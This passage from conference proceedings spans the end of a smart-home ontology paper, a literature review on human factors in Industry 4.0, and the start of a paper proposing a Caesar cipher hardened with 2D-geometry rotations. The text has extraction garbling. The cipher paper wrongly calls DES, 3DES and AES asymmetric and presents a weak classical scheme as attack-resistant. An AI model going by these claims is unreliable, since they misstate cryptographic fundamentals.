*Rules In the process of context inference and decision-making, it is important to be able to include explicit knowledge beyond the knowledge learned by automatic apprentissage. For example, logical rules to describe that if the person is a few minutes in the kitchen and in the meantime she has turned on the oven and opened the fridge, so the current activity is “cooking”. If a programming method. Statistical logic is applied, such a basis may have a numerical weight associated with each rule to model uncertainty. Then this value represents the probability that a rule be true in the real world. The rules in this module are mainly used to specify situations of interest and actions which must be executed when they are recognized. *Decision This component takes as input the output of the ontology to decide whether or not to act, and whether to take action. Eventually this will result in the next module sending commands to the controller layer in link with the things in the apartment: turn on the light, turn off the oven, make a call emergency. Ambient assistance systems that do not use ontologies are, for the most, based on rules to provide the necessary intelligence for the habitat. Concrè- These systems use first-order predicate logic to find the constraint to satisfy. Each constraint in the form of a scheduled program (script) listens to the input-output, retrieves the value or the posted data and then propagates it to all of its rules to verify those that will be satisfied. To fully understand this, let’s take the following example again. In this example, the smart home wants to illuminate the hallway when the elderly person gets up during the night. If the sensor of movement of the bedroom indicates “ON” it triggers the ruler to turn on the lights of the room as soon as a movement in the room is detected. This rule to be efficient adds temporal information so that run only after 6 p.m. Despite this, this rule remains very ineffective, in the sense that it does not know anything about the context in which it runs. No knowledge of the sensor history is known about the rule system, resulting in disability to establish very precise rules. In addition, no information is given on interactions between existing rules. Do they conflict? Do they cancel each other out? The lack of information on other entities involved in the process does not does not make this rule robust or manage temporal information, and Space. An example of information used in a smart home is the value of the state. A bedroom motion sensor. The value of the “ON” data only makes sense if we associate it with the device and the place in which it was captured. This information is then represented and then encapsulated with other information such as the time and merged to give birth to a knowledge. Example: The sensor Movement of the room above the bed gives “ON” at 22 h 25 min. This knowledge is associated with another knowledge: every evening at 8 pm. on no one lies on their bed to fall asleep. Inference allows us on the basis of this knowledge to say that the person is on his bed probably in the process of sleep.

218

M. El Hamdouni et al.

To enable the specification of knowledge, its expression, representation and sharing between machine or human and any other entity, the W3C (World Wide Web Consortium) has implemented a graph-oriented formalism based on XML standards. *High Level Ontology High level ontology represents concepts that are used at the reasoning level. These concepts are organized into three parts listed below: - Rules entity. These concepts relate to the elements used in inferences that do not relate to physical objects, such as the Situation or Order concepts. In most cases, the instances of these concepts are the possible values resulting from an inference process. So, for example, cooking or sleeping are instances belonging to the Activity class. - Physical entity. This groups together the classes that designate physical objects that are found in physical space or existing rooms. Unlike ontology low-level, here we do not try to describe specific objects in the environment, but rather to list the existing objects in the apartment without being interested in specific properties such as their location or identifiers. For example, a instance of the Object class is simply a door, without specifying which real object in the space she refers to. - Event entity. The instances in the high-level ontology are produced by the inference modules (e.g. location, activity, and situation) after processing the information from the sensors (which have been previously stored in the ontology of low level).

5 Conclusion The complete definition of ontology and the division of the representation model into two semantic layers is a particularly useful approach to adapt the system to new intelligent environments. Knowledge is not limited to describing the physical elements in the smart home; but they also contain abstract elements and the existing relationships between the different concepts of the domain. The extension of the knowledge model through the inclusion of logical rules has shown its relevance for the representation of situations at risk or distress.

References Modeling and reasoning of IoT architecture in semantic ontology dimension, Guan Shen computer communication 2020 IoT-Stream: A Lightweight Ontology for Internet of Things Data Streams and Its Use with Data Analytics and Event Detection Service Tarek Elsaleh sensor 2020 Bajaj, G., Agarwal, R., Singh, P., Georgantas, N., Issarny, V.: A study of existing Ontologies in the IoT-domain (2017) Ontologies and Semantic Web for the Internet of Things - a survey, Ioan Szilagy, Patrice wira 2016 Bae, I.-H.: An ontology-based approach to ADL recognition in smart homes. Futur. Gener. Comput. Syst. 33, 32–41 (2014) Hirmer, P., Wieland, M., Breitenb¨ucher, U., Mitschang, B.: Dynamic ontology-based sensor binding. In: Pokorn´y, J., Ivanovi´c, M., Thalheim, B., Saloun, P. (eds.) Advances in Databases and Information Systems: 20th East European Conference, ADBIS 2016, LNCS, vol. 9809, pp. 323–337. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-44039-2_22

A Decision-Making Model Based on a High-Level Ontology

219

Daniele, L., den Hartog, F., Roes, J.: Study on Semantic Assets for Smart Appliances Interoperability (2015) Compton, M., et al.: The SSN Ontology of the W3C Semantic Sensor Network Incubator Group, Web Semantics: Science, Services and Agents on the World Wide Web Poveda-Villal´on, M., G´omez-P´erez, A., Su´arez-Figueroa, M.C.: OOPS! (OntOlogy Pitfall Scanner!): An On-line Tool for Ontology Evaluation. Int. J. Semantic Web Inf. Syst. 10(2), 7–34 (2014) Brank, J., Grobelnik, M., Mladenic, D.: A survey of ontology evaluation techniques. In: Proceedings of the Conference on Data Mining and Data Warehouses (SiKDD 2005), pp. 166–170 (2005) Vrandeˇci´c, D.: Ontology evaluation. In: Handbook on Ontologies, pp. 293–313. Springer (2009) Desai, P., Sheth, A., Anantharam, P.: Semantic gateway as a service architecture for IoT interoperability. In: 2015 IEEE International Conference on Mobile Services (MS), pp. 313–319. IEEE (2015) L´ecu´e, F., et al.: Star-city: semantic traffic analytics and reasoning for city. In: Proceedings of the 19th International Conference on Intelligent User Interfaces, pp. 179–188. ACM (2014) Kazmi, A., Jan, Z., Zappa, A., Serrano, M.: Overcoming the Heterogeneity in the Internet of Things for Smart Cities. In: International Workshop on Interoperability and Open-Source Solutions, pp. 20–35. Springer (2016) van der Schaaf, H., Herzog, R.: Mapping the OGC sensor things API onto the OpenIoT middleware. In: Podnar Žarko, I., Pripuˇzi´c, K., Serrano, M. (eds.) Interoperability and Open-Source Solutions for the Internet of Things: International Workshop, FP7 OpenIoT Project, Held in Conjunction with SoftCOM 2014, Springer International Publishing, Croatia, 2014, pp. 62–70. https://doi.org/10.1007/978-3-319-56877-5_2 Seydoux, N., Drira, K., Hernandez, N., Monteil, T.: IoT-O, a CoreDomain IoT Ontology to Represent Connected Devices Networks. In: E. Blomqvist, P. Ciancarini, F. Poggi, F. Vitali (Eds.), Knowledge Engineering and Knowledge Management. EKAW 2016. Lecture Notes in Computer Science, vol. 10024, pp. 561–576 (2016) Agarwal, R., et al.: Unified IoT ontology to enable interoperability and federation of testbeds. In: 3rd IEEE World Forum on Internet of Things, pp. 70–75 (2016) OneM2M, TS-0012 oneM2M Base Ontology, Tech. rep. (2016) Willner, A., et al.: The open-multinet upper ontology towards the semantic based management of federated infrastructures. In: 10th EAI International Conference on Testbeds and Research Infrastructures for the Development of Networks & Communities (TRIDENTCOM), p. 10. ACM, Vancouver, Canada (2015) Hachem, S., Teixeira, T., Issarny, V.: Ontologies for the Internet of Things. In: Proceedings of the 8th Middleware Doctoral Symposium, pp. 3:1–3:6. ACM (2011) Bauer, M., et al.: IoT reference model. In: Enabling Things to Talk: Designing IoT solutions with the IoT architectural reference model, , pp. 113–162. Springer (2013) Bauer, M., et al.: IoT reference model. In: Enabling Things to Talk: Designing IoT solutions with the IoT architectural reference model (2013), pp. 113–162 (Springer). https://doi.org/10.1007/ 978-3-642-40403-0_7 Bassi, A., et al.: IoT reference architecture. In: Enabling Things to Talk: Designing IoT solutions with the IoT architectural reference model, pp. 163–211. Springer (2013) Suarez-Figueroa, M.C.: NeOn Methodology for Building Networks Ontology: Specification, Scheduling and Reuse, Ph.D. thesis, UPM (2010) Gyrard, A., Serrano, M., Atemezing, G.A.: Semantic web methodologies, best practices and ontology engineering applied to internet of things. In: 2015 IEEE 2nd World Forum on Internet of Things (WF-IoT), pp. 412–417. IEEE (2015)

Integration of the Human Factor in the Management and Improvement of Performance of Production Systems: An Exploratory Literature Review Saloua Farouq(B) , Reda Tajini, and Aziz Soulhi Systems Management & Engineering Team - MIS Engineering Systems and Digital Transformation Laboratory - LISTD Computer Science Department, Mines-Rabat School (ENSMR), Rabat, Morocco {saloua.farouq,tajini,soulhi}@enim.ac.ma

Abstract. Driven by the emergence of new technologies, the industry 4.0, knowing by the fourth revolution of industry, has become a challenge for all industries starting from 2011 when it appeared for the first time, a generation of connected, robotic and intelligent factories. With the digital revolution, the boundaries between the physical and digital world are diminishing to give life to an interconnected 4.0 factory in which employees, machines and products interact. Although, we observe an increasing trend in automating work in almost every industry, the human factor is still playing a central role in many activities in production systems. However, many of these planning models developed for managerial decision support, do not consider human factor and their impact on system performance, leading to inaccurate planning results and decisions, underperforming systems, and increased health hazards for employees. Many studies have shown that the human factor impacts directly on the performance of production systems in different domains, it depends on his attitude, his physical aspects, his mental health, etc. For that, the human factor must be integrated in the analysis of production systems performance to ensure a good effectiveness and good productivity. The purpose of this paper is to present a literature review regarding the new production systems in industry 4.0 and the place taken by the human factor in improving the performance of these systems. Keywords: Production systems · Human Factor · Industry 4.0 · Internet of Things · Cloud computing · Performance · 3D printing · Digitalisation · Efficiency

1 Introduction The term Industry 4.0 [1] stands for the fourth industrial revolution which is defined as a new level of organisation and control over the entire value chain of the life cycle of © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 220–229, 2023. https://doi.org/10.1007/978-3-031-35251-5_21

Integration of the Human Factor in the Management and Improvement

221

products, it is geared towards increasingly individualised complicated, automatic and sustainable so that people can operate machines simply, efficiently and persistently [2]. Considered as revolution, the main engine of this latter is the internet. The realisation of the intelligent factory relies on real-time communication to monitor, act on the company’s activities. The systems communicate and cooperate with each other, with humans, products and machines. Internet connects all objects of the plant: employees, machines, products, customers, suppliers, systems [3]. To ensure this communication, this revolution is based on including automation technologies in the manufacturing systems such as the Internet of Things (IoT) [9, 12], cloud computing [9, 12] and analytics, as well as artificial intelligence and machine learning in their production facilities and across their operations. The purpose of moving from mechanical, electrical and automated processes to automated systems using the previous technologies is to ensure a good productivity and efficiency of systems with less possible waste. Despite the opportunities that the automation of production systems offers, many companies still rely on human factor in several areas due to their flexibility and their cognitive and motor skills that machines cannot imitate economically yet [2]. Thus people may behave in nonspecified and non-predicted ways which are in fact beneficial to system performance [4]. In the opposition, in some cases, these operators are typically seen as a source of unpredictability causing errors and hazardous situations [5]; According to Azadeh & Zarrin (2016), Human factors are the cause of at least 66% of the accidents and more than 90% of the incidents not only in the maritime sector but also in different industries [6]. As most human factor experts know, a golden principle says that it is important to come in early in a design project [7]. Consequently, it is extremely favourable to include the human components into the equation of the shift towards the smart manufacturing [3]. Knowing the impact of the human factor on the performance of production systems means involving it from the initial phase of system design. As long as it has a perceptible impact on its performance, it must be ensured that in each phase, the human being is taken into consideration with its positive and negative sides in order to estimate the efficiency of the system and to react correctly as soon as possible in case of an abnormal situation. To highlight this issue, many studies have been carried out in different fields of activity that treat the human factor and its impact on system performance. In this paper, we will focus first on debriefing what was said about the fourth revolution of industry and the technologies that rely on this latter, the human factor, its impacts and in which domain was treated the most and finally the challenges of the integration of the human factor in the industry 4.0.

2 Industry 4.0: Overview from History The concept of Industry 4.0 [12] origins from Germany and was for the first time introduced in 2011. Industry 4.0 can be located in a larger industrial revolution framework. The first industrial revolution dates to the 1800s when mechanisation and the utilisation

222

S. Farouq et al.

of mechanical power revolutionised industrial work. Electrification set the premises for the second industrial revolution and mass production. The third industrial revolution took place in the 1970s when digitalisation with an introduction of microelectronics and automation were seen. The fourth industrial revolution has been triggered by the development of information and communications technologies and rapid technological development [8]. The figure below summarises the evolution of the industry in time (Fig. 1):

Fig. 1. Steps of four industrial Revolutions [2]

This fourth revolution is based on the integration of different technologies in order to achieve increased automation, predictive maintenance, self-optimising process improvements, and most importantly, a new level of efficiency and responsiveness to customers that was previously hardly respected. Those technologies differ from one field to another. Experts believe digitisation and the emergence of labour-saving technologies (e.g., intelligent robots, autonomous vehicles, and cloud solutions) will eliminate the majority of lower-skilled jobs while creating countless job opportunities in various areas such as automation engineering, control system design, machine learning, and software engineering [9]. What will be exposed in what follows will not cover all technologies; therefore, an overview of some seems essential. 2.1 Web and Mobile Applications Web and mobile applications have multiplied since the early 2000s. Nowadays, smartphone and tablet applications are the most used. Indeed, they facilitate exchanges within companies between internal and external collaborators. New web and mobile technologies, thanks to interconnected systems, facilitate the transfer of data and their rapid and intelligent processing. 2.2 3D Printing Also called “additive manufacturing” [3, 9, 12], its mission is to make it possible to manufacture components, if necessary, unique in record time. It thus frees itself from traditional processes, and gives Industry 4.0 new flexibility and speed. It is used in particular in aeronautics for the manufacture of certain complex parts, or in all sectors for prototyping.

Integration of the Human Factor in the Management and Improvement

223

2.3 Internet of Things (IoT) The Internet of Things (IoT) [3, 9, 12] is a defining element of smart factories. Machines in the factory are equipped with sensors that have an IP address that allows them to connect to other web-enabled devices. This mechanisation and connectivity make it possible to collect, analyse and exchange large volumes of valuable data. 2.4 Cloud Computing Cloud computing [3, 9, 12] is the cornerstone of any Industry 4.0 strategy. Full-fledged realisation of smart manufacturing requires connectivity and integration of engineering, supply chain, production, sales and distribution, and service. All of this is possible with the cloud. In addition, the usually large volume of stored and analysed data can be processed more efficiently and cost-effectively through the cloud. Cloud computing can also reduce start-up costs for small and medium-sized businesses that can adapt their needs and scale as they grow.

3 Human Factors The human factor can be defined as the human contribution involved in an event. It includes behaviours, abilities, and individual characteristics (interpersonal skills, communication, fatigue, etc.). HF has been, arguably, a blind spot in engineering education and practice. Nevertheless, every engineering design engages people in some way throughout its lifecycle. Someone has to assemble the design, use the design, maintain the design, and dismantle and recycle the design at the end of its life-cycle; with humans intimately engaged in the engineered system lifecycle, it should not be surprising that the HF in the design of the system affects ultimate system performance [2].

4 Literature Review To explore the literature review treating the ‘industry 4.0’ and the ‘human factor”, we use ScienceDirect as a database formulating the requests below: Among 40 papers that have been read in relation to the subject and using the correlation of both tools, Zotero and Nvivo, the two tools used in this literature review, the figure below summarises the number of the selected papers (33) per year (Fig. 2): Dividing the papers read by typology, we have the results in the graph below (Fig. 3): The authors of the papers listed below used keywords in relation to the basic terms of our subject in order to analyse it; we can summarise those keywords in the cloud of words that shows the occurrence of each term in those papers. Below is the representation of this cloud word (Fig. 4): The cloud word shows the topics that were treated by the authors, showing the most signalled terms in the middle as a system, human factor, design, etc., to the least mentioned (transport, health, etc.).

224

S. Farouq et al. Table 1. Requests for research

N° Key word

Request

1

Human factor

1

2

Industry 4.0

2

3

The impact of human factor

3

4

Performance of production system 4.0

4

5

Morocco

5

6

Human factor in the industry 4.0

“1” AND “2”

7

The impact of the human factor in the industry 4.0

“3” AND “2”

8

The impact of human factor in the performance of the production “3” AND “4”AND “5” system 4.0 in Morocco

Fig. 2. The number of selected papers per year

Fig. 3. Repartition of selected papers per typology

Integration of the Human Factor in the Management and Improvement

225

Fig. 4. Cloud word

Based on the generated database of selected papers, we can separate them into three categories: one that treated only the human factor, the other that treated basically industry 4.0, and finally the last one that treated both. Below is the result of this separation (Fig. 5):

Fig. 5. Repartition of selected papers per theme

In conclusion, from the figure above, 72.7% of selected papers treat only human factors and their impact on different domains that will be detailed afterwards. 12.1% of those papers treated only the industry 4.0 and, finally, 15.2% of papers treated the relationship between human factors and the industry 4.0. Hence the need to highlight the subject once again, “the impact of the human factor in the industry 4.0”, due to missing papers which treated both showing the impact of the human factor in the industry 4.0, especially on the production systems 4.0.

226

S. Farouq et al.

This fourth revolution becomes a trend and a purpose for all types of industries as long as it affects productivity and efficiency positively. According to the corpus text that we had after this literature review, 72.7% of papers studied the human factor in various fields were cited as follows (Fig. 6):

Fig. 6. Repartition of selected papers related to human factors by domain

As a comment on the graph above, we can conclude that the high portion of the domain where the human factor was treated is the medicine and health care domain, followed by the manufacturing systems with 13.8%, and then comes the industry 4.0; Focusing on the 13.8%, as long as it is our principal subject, major authors confirmed the systematic impact of the human factor in the performance and productivity of systems. In terms of the types of HF aspects that have been considered in the presented papers, we observed a strong tendency to investigate physical HF such as human energy expenditure and physical fatigue, which have been considered, for example, as constraints in analytical models. Fewer works focused on perceptual, mental, or psychosocial aspects [8].

5 Challenges of Human Factor The human factor study is defined as the scientific discipline concerned with the understanding of interaction between humans and other elements of a system, and the profession that applies theory, principles, data and methods to design in order to optimise human well-being and overall system performance [10]. In relation to the fourth revolution, Industry 4.0 and digital transformation are fundamentally reshaping the ways of working for human resources [9]. Consequently, here are some impacts related to the industry 4.0 on the human factors:

Integration of the Human Factor in the Management and Improvement

227

• The number of jobs in manufacturing will be decreasing due to automation, but new jobs will be created around the machines [8]. • Human tasks “will” become more complex and digitalisation enables that high-skilled employees may be provided with a variety of tasks in addition to the core tasks that have been issued [8]. • Humans should be provided with more possibilities for autonomous decision-making, work diversity, and possibilities to social interactions [8]. • Humans are also seen having their values, attitudes, and respect for others, which attributes separate them from technological devices, and this should be emphasised in management processes [8].

6 Challenges of New Technologies It is broadly accepted that the Industry 4.0 technologies and applications are still in their infancy. The potential economic benefits of industry 4.0 may be offset with a few major challenges. Some key challenges have to do with scientific, technological, and societal issues challenges on technical aspects of technology, security and privacy, and standardisation. Efforts are needed to address these challenges [12]. • New technologies may incur new kinds of problems for operators due to insufficient information provided by the manufacturing systems and more attention should be paid to the design of interfaces between humans and new technology and to integrating these design aspects of practice into manufacturing processes [8]. • Complex technologies may incur possibilities to unintended uses by the humans if the usability and cognitive processes are neglected in the design phase [8]. • A gap between the needs and wishes of operators in new technology transformation might exist and too much emphasis is paid to the manager’s visions of digitalisation and technological transformation [8]. • In digitalisation, robotisation and extended use of assistive technologies, like exoskeletons and smart gesture control systems may lead to more efficient work, as humans do not need to lose time on non-productive actions like waiting and seeking [8].

7 Analysis and Discussions According to synthesis of each article noted as selected one, the human factor and their impact were treated in different domains, medicine and health care comes first as long as their impact can be considered as critical since it touches human life directly. In addition, the impact of human factor also took place in manufacturing systems which were the subject of an amount of papers; the industry 4.0 was a part of those articles even with a small portion. This literature analysis also revealed that, despite the advantages and benefits of the fourth revolution in system performance, human cannot be eliminated from manufacturing processes; they are always there and play different rules than the previous revolutions: Human/operator/user employed to verify system/machine startup, forecasts

228

S. Farouq et al.

and intervene in case of necessity, describe what should be done in case of an abnormal condition, escalate a downtime problem, rely on another operator for input, etc. However, his new tasks will be more complicated, needing more training and solid abilities and skills as long as they consist of system management and maintain a good communication, link between processes; Nevertheless, those new roles are presenting challenges for both human and industries and can also introduce new types of threats to human well-being and indirectly to the system’s performance.

8 Conclusions Throughout this paper, we started by giving an overview of Industry 4.0 based on the literature review, and then we treated the human factor and in which domain the authors signalled those factors, what the major ones that were impacting the system’s performance, and finally the challenges of both the human factor and Industry 4.0. We can conclude based on the corpus text that human factors have been for a long time an open issue during analysis of the system’s performance as long as most industries during the conception of their design systems do not include humans from the beginning of the conception. If HF in system design and management are not appropriately considered, then poor system performance can be expected. This conceptual framework has been validated in case research in a variety of manufacturing contexts [13]. Consequently, an important attention should be given to those factors since they can impact systematically the productivity and the efficiency as long as this failure to attend to HF in I4.0 research has been observed in previous industrial system generations and has had negative consequences for individual employees, production organisations, and for society as a whole [13]. To do so, and in order to have a representative vision about the impact of human factors in the performance of systems, the modelisation and the simulation can play an important role to simulate how can the factors related to human can affect the productivity of the production systems 4.0. Our future word then will be based on: • Identification and qualification of the needs of 4.0 production systems; • A contribution to the development of a decision-making model that meets to the challenges of Industry 4.0, in particular: 1) The determination of useful indicators for industrial decision-makers in targeting objectives; 2) The definition of a decision-making methodology allowing meeting these objectives; 3) The development of a software solution by integrating the approach Simulation / Optimisation proposed. • Experimentation of solutions and analysis of results in an industrial case.

Integration of the Human Factor in the Management and Improvement

229

References 1. Vaidya, S., Ambad, P., Bhosle, S.: Industry 4.0 – A Glimpse. Procedia Manufacturing», 2nd International Conference on Materials, Manufacturing and Design Engineering (iCMMD2017), 11–12 December 2017, MIT Aurangabad, Maharashtra, INDIA, pp. 233–238 (2018). https://doi.org/10.1016/j.promfg.2018.02.034 2. Sgarbossa, F., Grosse, E.H., Patrick Neumann, W., Battini, D., Glock, C.H.: Human factors in production and logistics systems of the future. Annu. Rev. Control. 49, 295–305 (2020) 3. El Hamdi, S., Abouabdellah, A., Oudani, M.: Industry 4.0: fundamentals and main challenges. In: 2019 International Colloquium on Logistics and Supply Chain Management (LOGISTIQUA) (2019). https://doi.org/10.1109/LOGISTIQUA.2019.8907280 4. Wilson, J.R.: Fundamentals of systems ergonomics/human factors. Appl. Ergon. Syst. Ergonomics/Hum. Factors 45(1), 5–13 (2014). https://doi.org/10.1016/j.apergo.2013.03.021 5. Dantan, J.-Y., El Mouayni, I., Sadeghi, L., Siadat, A., Etienne, A.: Human factors integration in manufacturing systems design using function–behavior–structure framework and behaviour simulations. CIRP Ann. 68(1), 125–128 (2019). https://doi.org/10.1016/j.cirp.2019.04.040 6. Coraddu, A., Oneto, L., de Maya, B.N., Kurt, R.: Determining the most influential human factors in maritime accidents: a data-driven approach. Ocean Eng. 211, 107588 (2020).doi:https:// doi.org/10.1016/j.oceaneng.2020.107588 7. Rollenhagen, C.: 3 - from classical human factors toward a system view—experiences from the human factors nuclear field in sweden. In: Human Factors in the Nuclear Industry, édité par Anna-Maria Teperi et Nadezhda Gotcheva, pp. 55–71. Woodhead Publishing Series in Energy. Woodhead Publishing (2021). https://doi.org/10.1016/B978-0-08-102845-2.00003-X 8. Reiman, A., Kaivo-oja, J., Parviainen, E., Takala, E.-P., Lauraeus, T.: Human factors and ergonomics in manufacturing in the industry 4.0 context – a scoping review. Technol. Soc. 65, 101572 (2021). https://doi.org/10.1016/j.techsoc.2021.101572 9. Ghobakhloo, M.: Industry 4.0, digitization, and opportunities for sustainability. J. Cleaner Prod. 252, 119869 (2020). https://doi.org/10.1016/j.jclepro.2019.119869 10. Cimini, C., Lagorio, A., Pirola, F., Pinto, R.: Exploring human factors in logistics 4.0: empirical evidence from a case study. In: IFAC-PapersOnLine, 9th IFAC Conference on Manufacturing Modelling, Management and Control MIM 2019, 52, no 13, pp. 2183–2188. https:// doi.org/10.1016/j.ifacol.2019.11.529 11. Stern, H., Becker, T.: Development of a model for the integration of human factors in cyber-physical production systems. In: Procedia Manufacturing, 7th Conference on Learning Factories, CLF 2017, vol. 9, pp. 151–158 (2017). https://doi.org/10.1016/j.promfg.2017. 04.030 12. Xu, Li, Eric L. Xu, Li, L.: Industry 4.0 : state of the art and future trends. International Journal of Production Research, International journal of production research. - London : Taylor & Francis, ISSN 0020-7543, ZDB-ID 160477-6. - Vol. 56.2018, 8 (1/15.4.), pp. 2941–2962, 56, no 8 (2018) 13. Neumann, W.P., Winkelhaus, S., Grosse, E.H., Glock, C.H.: Industry 4.0 and the human factor – a systems framework and analysis methodology for successful development. Int. J. Prod. Econ. 233, 107992 (2021). https://doi.org/10.1016/j.ijpe.2020.107992

Securing Caesar Cryptography Using the 2D Geometry Fatima Zohra Ben Chakra1(B) , Hamza Touil2 , and Nabil El Akkad1,2 1 LISA, National School of Applied Sciences (ENSA), Sidi Mohamed Ben Abdellah University,

Fez, Morocco {fatimazohra.benchakra,nabil.elakkad}@usmba.ac.ma 2 LISAC, Faculty of Sciences, Dhar-Mahraz (FSDM), Sidi Mohamed Ben Abdellah University, Fez, Morocco [email protected] Abstract. Cryptography has now become a science in its own right, where, mathematics, computer science, and sometimes even physics, are meeting to allow all secured exchanges between distributed systems, by ensuring confidentiality, authenticity and integrity of digital information. Throughout this paper, a method of securing the most famous crypto-system of antiquity will be presented, using the 2D geometry. Being the origin of cryptography, the Caesar cryptosystem, presented a very basic method to encrypt messages. However, with the arrival of cryptanalysis, this method is no longer up to date. In fact, a simple exhaustive search can break the entire cryptosystem, and thanks to the algorithm of hybrid cryptography, inspired by the 2D geometry, we overcome this limitation, offering a method to expand the space of possible keys and manipulate the encrypted message so that any attacker cannot detect the original message. Keywords: Hybrid cryptography · Caesar · 2D Geometry

1 Introduction Nowadays, the biggest concern of technology is the need to enhance security in order to guarantee the CIA triad of information exchange [1, 2]. As a result, we call more and more for techniques that integrate modern cryptographic solutions to improve information protection with minimal impact on system performance. Since its existence, classical cryptography has been known for the variety of methods proposed, based on mathematical functions, and associated with parameters called: keys. Moreover, classical cryptosystems consist mainly of two elements: the algorithm, or the method of encryption/decryption of the text, and the key, a simple modification of one of these elements automatically implies a change of the cipher text [3], which is called the avalanche effect [4–6]. The efficiency of a cryptosystem lies in the simplicity and invulnerability of the algorithm, as well as the confidentiality and difficulty of disclosing the key. Let us cite the example of the Caesar method, whose encryption consists in putting the letters in disorder by respecting a precise number of shifts in the alphabet, noting that the key is the number of shifts to be made [7, 8]. In other hand, the decryption of the text is done by © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 230–239, 2023. https://doi.org/10.1007/978-3-031-35251-5_22

Securing Caesar Cryptography Using the 2D Geometry

231

the reverse shift with the same key. The algorithm is simple and understandable enough to begin the science of cryptography, but not to cope with cryptanalysis. Indeed, the limit of the number of keys to be used makes the system weaker, and easy to break it with a simple exhaustive search of the keys, while trying each key until finding a meaning in the original text [9, 10, 11, 12]. Other algorithms were proposed afterwards, such as Vigenere and Hill for symmetric cryptography, and DES, 3DES, AES for asymmetric cryptography [13–16]. Each of the two types have been used to fix specific weaknesses, however, they are no longer secure and pose a threat, hence the use of modern cryptography [17, 18]. By using other fields apart from information technology, it is possible to design stronger crypto-systems and take advantage of the benefits offered by both domains. Let us take the example of DNAbased cryptography. In fact, DNA is known to carry information from one generation to the next and is very useful for cryptography [19–21]. Regarding our method, we have taken advantage of the simplicity of the 2D geometry properties, applying them for the manipulation of encrypted data by the classical Caesar method, in order to present a secure and strengthened crypto-system in terms of resistance to known attacks. In the rest of this paper, we will present the related work, and we will explain our method on the encryption phase as well as the decryption one. We will finish with an experimentation of the two phases, addressing the points of resistance to attacks.

2 Related Work A set of studies have been proposed to ensure the CIA model during digital exchanges. In terms of authentication, we can quote for example, the technique [22] allowing securing passwords during online authentications by applying a rotation on the generated hash before storing it on the database. As well as the method proposed in [23], which aims at reinforcing the security of the storage of passwords by relying on the random generation of an MD5 HASH, then by using it to transform the original HASH according to predefined rules before storing it in the database. Both methods were defined to support forgery attacks. In the hybrid cryptography approach, [3] proposes a combination between the two cryptosystems: Vigenere and Hill, a method resistant to several attacks including static attacks. Also adding the two methods [6] and [7], combining respectively between the two-square cipher and Caesar cipher, and the Four-Square and Zigzag Encryption. Such combinations are generally effective in dealing with the limitations of classical cryptosystems. Touil, H [24] proposes in terms of real-time exchanges, a secure approach that mainly meets the requirements of quality of service over a communication channel by using the robustness and flexibility of the TLS protocol.

3 Proposed Method 3.1 Explanation of the Method We propose a new hybrid encryption method combining the Caesar method and the most known 2D geometric shapes. First of all, we introduce the text to be encrypted, then we eliminate of all the spaces and the existing tabs in order to obtain a homogeneous text and easy to cut. Then, the first step is to apply the Caesar method for shifting the letters with a randomly chosen rank. The second step is defined by the choice of a 2D

232

F. Z. Ben Chakra et al.

geometrical shape among a predefined list, so that the number of spikes of the shape to be chosen is lower or equal to the size of the text obtained. After that, depending on the number of spikes of the chosen shape, we make a first extraction of the text, and we put the extracted letters in the spikes. Then we make a single rotation clockwise, and store the result. We repeat the procedure in the same way, to extract and cut the rest of the text, until the end. Finally, the cipher text is obtained by the concatenation of the stored extracts, as well as the key is constituted by the Ceasar rank, and the series of geometric shapes used in each phase of extraction. [Fig. 1]. 3.2 Encryption Process As shown in Fig. 1, the encryption phase, mainly consists in securing the Caesar method by adding a new layer of text manipulation, so that any attacker cannot detect or disclose the original message. The following is a representation of the different steps:

Introduce the text to encrypt

Delete all spaces and tabs Original Text Apply Caesar Cipher F = Caesar Key (chosen randomly) P0 = Output of Ceasar cipher Choose a 2D geometric form randomly from a defined list. Where: Ni = number of the form’s spickes And N0 or = to 1

Ei

The first letters to be extracted from the Pi

Ci

The result of the rotation after each round

C

The final encrypted text, the cipher text

K

The key of the proposed method

The second phase of our method refers to the security of the obtained text P0. The algorithm is defined, firstly by the choice of a 2D geometrical shape among a predefined list, with the condition that the N of the chosen shape must be lower or equal to the size of P0. The list to be considered by the algorithm is segment, Triangle, Rectangle, Pentagon, Hexagon, Heptagon, Octagon, Nonagon and star. In the following, we explain the three cases encountered by the algorithm: • First Case: the number of spikes of the chosen form is strictly inferior to the size of the text encrypted by Caesar. In this case, a first extraction must take place based on the N, such as: E1 represents the first extracted block from P0 and the size of E1 = N. To simplify the comprehension of the algorithm, we take the extracted block E0, and we place each letter on the spikes of the chosen 2D geometrical shape, following the clockwise direction. Then, we make a simple rotation of the letters in the clockwise direction. The result obtained, will be stored to the end. We repeat the same procedure on the rest of the text after the extraction, the P1, starting from the process of choosing another geometric shape. Consider Pi, the rest of the extraction after each round i. During each round i, we define, the Ni chosen as sub-keys to be sent with the Caesar key, as well as the Ci to be concatenated to have the final Cipher-text, such as: The key to send: K = [F, N0, N1… Ni] The final cipher text: C = C0 + C1 + … + Ci.

234

F. Z. Ben Chakra et al.

• Second case: the number of spikes of the chosen shape is equal to the size of the text encrypted by Caesar. We directly make a clockwise rotation, assuming that E0 = P0, and we continue the procedure as indicated above. • Third case: the size of the P0, or Pi in general, is equal to 1. It is the final stage where no action is needed for the letter, and it is stored to the end. 3.3 Decryption Process When the Cipher-text C and the Ni sub-keys arrive, we execute an inverse treatment of the encryption process. We first proceed by partitioning the text into small blocks Ci, based on the received Ni sub-keys, such as: The size of Ci = Ni. Then, we apply a counter-clockwise rotation on each Ci block, and we concatenate the obtained sub-texts to find the P0 encrypted by Caesar cipher. As a last step, we perform a Caesar decryption, with the predefined rank, to recover the original text. It is indeed a reverse shift by F positions. [Fig. 2].

Cipher text C

Key K = [F, N0, N1,…,Ni]

Split the C on mini blocs Ci, where the size of Ci = Ni

C1

C2



Ci

Apply a counter clockwise rotation on each Ci, and concatenate the result as the P0

Apply Caesar decryption Where F is the decryption key

The original text Fig. 2. Decryption process

Securing Caesar Cryptography Using the 2D Geometry

235

